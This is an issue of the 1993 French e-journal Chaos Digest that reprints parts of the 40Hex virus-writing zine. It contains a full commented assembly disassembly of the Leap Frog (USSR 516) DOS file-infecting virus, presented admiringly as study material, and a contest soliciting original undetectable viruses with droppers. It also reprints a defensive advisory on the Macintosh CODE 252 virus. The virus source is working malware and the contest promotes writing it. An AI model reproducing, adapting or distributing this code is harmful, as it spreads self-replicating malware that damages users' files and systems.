Chaos Digest Vendredi 25 Juin 1993 Volume 1 : Numero 62
ISSN 1244-4901
Editeur: Jean-Bernard Condat (
[email protected])
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.62 (25 Juin 1993)
File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint)
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
[email protected]
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST
The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.
Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Tue May 11 09:24:40 PDT 1993
From:
[email protected] (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 7 Volume 2 Issue 3 #006-008(1) (reprint)
40Hex Number 7 Volume 2 Issue 3 File 006
Virus Spotlite on: Leap Frog
It's always interesting to find new residency techniques. I suppose everyone
by now is tired of the traditional high-memory loading routine and is on the
lookout for something different. 40Hex comes to the rescue!
This virus, the "Leap Frog" or USSR 516, has one of the most unique methods
I have ever seen. I was mucking around in VSUM and noticed that it, according
to Patricia, it "installs itself in a hole in memory between MSDOS and the DOS
Stacks." She is, of course, not telling us the entire story. Leap Frog
basically latches onto and resides in a DOS disk buffer. I do not know who
the author is, but I commend him for his innovative technique. I took the
liberty of disassembling the virus which is given below. It should be an
exact byte-for-byte matchup of the original carrier file (or at least should
be extremely similar). The offsets are in their correct locations, etc, etc.
It is simple to understand and terribly efficient.
Although the coding is tight, there are some inconsistencies. For
example, I do not understand the purpose of the timing routine(int 21h/ah=30h)
in the code. I also do not understand why the author decided to infect COM
files in such an abnormal way. An interesting "feature" is the disabling of
Control-Break checking - a thoroughly unnecessary piece of code. I believe
further that the line above "findmarker" should read:
lds di,dword ptr ds:[30h*4]
In any case, the code is otherwise very, very good. It is great for studying
by newcomers and "oldtimers" alike. Things to look for:
Residency routine
Lack of extensive use of relative offsets
Use of stack frame in the interrupt handler
Critical error handler
Enjoy! Dark Angel of PHALCON/SKISM
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
;Disassembled by Dark Angel of PHALCON/SKISM
;for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
;This is where the virus really begins
start:
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ;Actually it's int 21h
;entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ;BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ;DI -> orig4
movsw ;restore original
movsw ;4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ;int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ;Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ;Find marker bytes
jne findmarker ;to the entry point
mov [bp+4],di ;and move to
mov [bp+6],ds ;int30store
mov ax,5252h ;Get list of lists
int 21h ;and also ID check
add bx,12h ;Already installed?
jz quitvir ;then exit
push bx
mov ah,30h ;Get DOS version
int 21h
pop bx ;bx = 12, ptr to 1st
;disk buffer
cmp al,3
je handlebuffer ;if DOS 3
ja handleDBHCH ;if > DOS 3
inc bx ;DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ;Get seg:off of buffer
inc si
pop di
pop es ;ES:DI->seg:off buff
mov ax,[bx] ;ptr to next buffer
cmp ax,0FFFFh ;least recently used?
jne handlebuffer ;if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ;Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ;ptr to disk buffer
lodsw ;info
lodsw ;seg of disk buffer
;hash chain head array
inc ax ;second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ;EMS page, -1 if not
;in EMS
xchg ax,di ;save in di
lodsw ;ptr to least recently
;used buffer
mov [di+2],ax ;change disk buffer
;backward offset to
;least recently used
xchg ax,di ;restore EMS page
mov [di],ax ;set to least recently
movetobuffer: ;used
mov di,bx
push ds
pop es ;ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ;Copy from start
rep movsw
mov ds,cx ;DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ;New interrupt handler
mov word ptr ds:[4*21h+2],es ;at int21
quitvir:
push cs ;CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ;set up stack for
push si ;the return to the
retn ;original program
int24:
mov al,3 ;Ignore all errors
iret
tickstore db 3 ;Why???
buffer db 3, 0, 9, 0
int21:
pushf
cli ;CP/M style call entry
call dword ptr cs:[int30store-start]
retn ;point of int 21h
int21DSDX: ;For int 21h calls
push ds ;with
lds dx,dword ptr [bp+2] ;DS:DX -> filename
call int21
pop ds
retn
cmp ax,4B00h ;Execute
je Execute
cmp ax,5252h ;ID check
je CheckID
cmp ah,30h ;DOS Version
je DosVersion
callorig21: ;Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ;Why????? ;DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ;Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ;# 2-17
pop ax
pop es
iret
CheckID: ;ID Check
mov bx,0FFEEh ;FFEEh = -12h
iret
Execute: ;Execute
push ax ;Save registers
push cx
push es
push bx
push ds ;DS:DX -> filename
push dx ;save it on stack
push bp
mov bp,sp ;Set up stack frame
sub sp,0Ah ;Temporary variables
;[bp-A] = attributes
;[bp-8] = int 24 off
;[bp-6] = int 24 seg
;[bp-4] = file time
;[bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ;Turn off ^C check
xor dl,dl ;(never turn it back
call int21 ; on. Bug???)
mov ax,3524h ;Get int 24h
call int21 ;(Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ;Set to new one
call int21
mov ax,4300h ;Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ;Restore crit error
lds dx,dword ptr [bp-8] ;handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ;Call orig handler
continue:
mov [bp-0Ah],cx ;Save attributes
test cl,1 ;Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ;Clear attributes
call int21DSDX ;Filename in DS:DX
jc doneinfect ;Quit on error
noclearattr:
mov ax,3D02h ;Open read/write
call int21DSDX ;Filename in DS:DX
jc doneinfect ;Exit if error
mov bx,ax
mov ax,5700h ;Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ;Read 4 bytes to
call int21 ;buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h;Must start with 0E9h
jne quitinf ;Otherwise, quit
mov dx,word ptr ds:[buffer+1-start];dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ;go there
call int21
mov ds:[buffer-start],ax ;new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ;Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ;0E9h means we might
jne infect ;already be there
mov ax,ds:[orig4+2-start] ;continue checking
add al,dh ;to see if we really
sub al,ah ;are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx
mov ax,4202h ;Go to EOF
call int21
mov ds:[buffer+2-start],ax ;save filesize
mov cx,204h
mov ah,40h ;Write virus
call int21
jc quitinf ;Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ;AX->jmp offset
mov word ptr ds:[buffer+1-start],ax;Set up buffer
mov byte ptr ds:[buffer-start],0E9h;code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ;Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ;Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ;Restore date/time
call int21
mov ah,3Eh ;Close file
call int21
mov cx,[bp-0Ah] ;Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ;Return
ussr516 ends
end stub
+++++
40Hex Number 7 Volume 2 Issue 3 File 007
Just a friendly reminder:
------------------------
Virus Contest!
'The Spammies(tm)'
------------------------
Deadline: July 4th, 1992
This is the first PHALCON/SKISM virus contest. As a matter of fact, this
is the first contest of its kind. We believe that it will motivate you to
produce more original code, rather than more hacks. Winners may have already
won $10,000,000, as well as the prestige of winning the first ever 'Spammie'
awards.
Rules and Regulations:
1) All submissions must be original source code. (no hacks)
2) Only one submission is allowed per programmer, plus one group project.
3) All viruses must be recieved by us before July 4th, 1992.
4) Viruses must be accompanied by a complete entry form. (see below)
5) The original, compilable, commented source MUST be included, along with an
installer program, or a dropper, in the case of boot block viruses.
6) Entries must include a location where the author may be contacted, such as
an email address or a BBS.
7) Personnel or persons related to personnel of PHALCON/SKISM are not
eligable.
8) The source must compile without error under Tasm or Masm (please specify
what assembler and version you used, along with the necessary command line
switches). If we cannot compile your virus, it will be disqualified.
9) All entries recieve a free subscription to 40hex. (hehehehe)
10) The entry must be uploaded privately to the sysop, stating that it is a
contest entry.
11) The viruses must not be detectable by the current version (as of July 4th)
of any known virus scanner.
12) Viruses will be judged by our 'panel of experts' in three catagories.
6.1) Stealth
6.2) Size
6.3) Reproductivity
6.4) Performance
For example, Red Cross is an example of a 'high performance' virus.
It was entertaining and well done.
*** Entry Form
Handle ________________________
Group Afiliation ______________
Virus Name ____________________
Size ____bytes (if you need more spaces, go away)
Type ___ File Infector ___ Boot block
Infection method ___ Direct Action ___ Memory Resident ___ Directory chain
___ Other (please describe it in detail)
Encryption routine ___ None (bah) ___ Xor loop
___ Other (please describe it in detail)
Describe what makes your infection routine unique.
______________________________________________________________________________
_
______________________________________________________________________________
_
Describe what makes your encryption routine unique.
______________________________________________________________________________
_
______________________________________________________________________________
_
Describe what means your virus uses, other than encryption, to keep itself
hidden.
______________________________________________________________________________
_
______________________________________________________________________________
_
What is the largest possible scan string for this virus? __bytes
What else sets this virus apart from other viruses?
______________________________________________________________________________
_
______________________________________________________________________________
_
______________________________________________________________________________
_
+++++
40Hex Number 7 Volume 2 Issue 3 File 008
More Virus News. An informed virus Programmer is a good one.
Article 1: New Macintosh Virus
Article 2: RockSteady's 666 Virus [NuKE]
Article 3: A Stooge's View
<<<<<<<<<
Article 1
<<<<<<<<<
Date: Fri, 17 Apr 92 11:34:50 -0500
>From: Gene Spafford <
[email protected]>
Subject: Mac announcement - new virus (Mac)
New Macintosh Virus Discovered
17 April 1992
Virus: CODE 252
Damage: some, possibly severe (see text)
Spread: unknown (see text)
Systems affected: Apple Macintosh computers. All types, but see text.
A new virus, which has been designated "CODE 252", has been discovered
on Apple Macintosh computer systems. This virus is designed to trigger
if an infected application is run or system booted between June 6 and
December 31, inclusive. When triggered, the virus brings up a dialog
box with the message:
You have a virus.
Ha Ha Ha Ha Ha Ha Ha
Now erasing all disks...
Ha Ha Ha Ha Ha Ha Ha
P.S. Have a nice day.
Ha Ha Ha Ha Ha Ha Ha
(Click to continue...)
Despite this message, no files or directories are deleted in the
versions of the virus we have seen; however, a worried user might
power down the system upon seeing the message, and thus corrupt the
disk -- this could lead to significant damage. Furthermore, the virus
may interact with some applications in such a manner as to damage them.
Under System 7, the System file can be seriously damaged by the virus
under at least some circumstances as the virus attempts to spread.
This may lead to a system that will not boot, crashes, or other
unusual behavior.
Between January 1 and June 5, inclusive, the virus simply spreads from
applications to system files, and then on to other application files.
At the present moment, we have no indication that the virus causes
direct damage to any existing applications.
The virus does not spread to other applications under MultiFinder on
System 6.x systems, nor will it spread under System 7. However, it
will run on those systems if an infected application is executed.
Even if you are running one of these systems, we recommend you obtain
an use one of latest versions of appropriate anti-virus software.
As of the date of this announcement (17 April 92), we have had limited
reported sightings of this virus. This, combined with the nature of
operation of the virus, leads us to believe that the virus is not yet
widespread.
The current versions of Gatekeeper and SAM Intercept (in advanced and
custom mode) are effective against this virus. Either program should
generate an alert if the virus is present and attempts to spread to
other files. The Virex Record/Scan feature will also detect the virus.
Authors of all major Macintosh anti-virus tools are planning updates
to their tools to locate and/or eliminate this virus. Some of these
are listed below. We recommend that you obtain and run a CURRENT
version of AT LEAST ONE of these programs.
Some specific information on updated Mac anti-virus products follows:
Tool: Disinfectant
Status: Free software (courtesy of Northwestern University and
John Norstad)
Revision to be released: 2.8
Where to find: usual archive sites and bulletin boards --
ftp.acns.nwu.edu, sumex-aim.stanford.edu,
rascal.ics.utexas.edu, AppleLink, America Online,
CompuServe, Genie, Calvacom, MacNet, Delphi,
comp.binaries.mac
When available: soon
Tool: Gatekeeper
Status: Free software (courtesy of Chris Johnson)
Revision to be released: 1.2.6 (probably)
Where to find: usual archive sites and bulletin boards --
microlib.cc.utexas.edu, sumex-aim.stanford.edu,
rascal.ics.utexas.edu, comp.binaries.mac
When available: eventually
Comments:
Gatekeeper should find this virus if it attempts to infect your
system or applications, and thus does not need an update.
Gatekeeper Aid will need an update to "know" exactly what virus it
is seeing so it can remove the virus, but the update is not
crucial for continued protection. As Gatekeeper is freeware and
Chris has a "real" life, this update may not be immediate.
Tool: Rival
Status: Commercial software
Revision to be released: Rival 1.1.9v (CODE 252 Vaccine or Refresh 1.1.9v)
Where to find it: AppleLink, America Online, Internet, Compuserve.
When available: Immediately.
Tool: SAM (Virus Clinic and Intercept)
Status: Commercial software
Revision to be released: 3.0.8
Where to find: CompuServe, America Online, Applelink, Symantec's
Bulletin Board @ 408-973-9598
When available: 17 April 1992. Version 3.0.8 of the Virus
Definitions file are also available.
Tool: Virex INIT
Status: Commercial software
Revision to be released: 3.8
Where to find: Microcom, Inc (919) 490-1277
When available: Immediately.
Comments:
Virex 3.8 will detect and repair the virus. All
Virex subscribers will automatically be sent an update on
diskette. All other registered users will receive a notice with
information to update prior versions to be able to detect
CODE 252. This information is also available on Microcom's BBS.
(919)419-1602, and is presented here:
Guide Number = 6324448
1: 0203 3001 7778 2A00 / 79
2: 0C50 4EFA 0003 A9AB / C4
3: 0004 A9AA 0002 A647 / B2
4: 8180 9090 9090 9090 / 1B
Tool: Virus Detective
Status: Shareware
Revision to be released: 5.0.4
Where to find: Usual bulletin boards will announce a new search string.
Registered users will also get a mailing
with the new search string.
When available: Immediately.
Comments: search strings are:
Resource Start & Size < 1200 & WData 2F2C#23F3C#2A9A0*3F3C#24878#2A9AB;
For find CODE 252 in Appl's
Filetype=ZSYS & Resource INIT & Size < 1200 & WData 2F2C#
3F3C#2A9A0*3F3C#24878
#2A9AB; For find CODE 252 in System
If you discover what you believe to be a virus on your Macintosh
system, please report it to the vendor/author of your anti-virus
software package for analysis. Such reports make early, informed
warnings like this one possible for the rest of the Mac community.
------------------------------
End of Chaos Digest #1.62
************************************
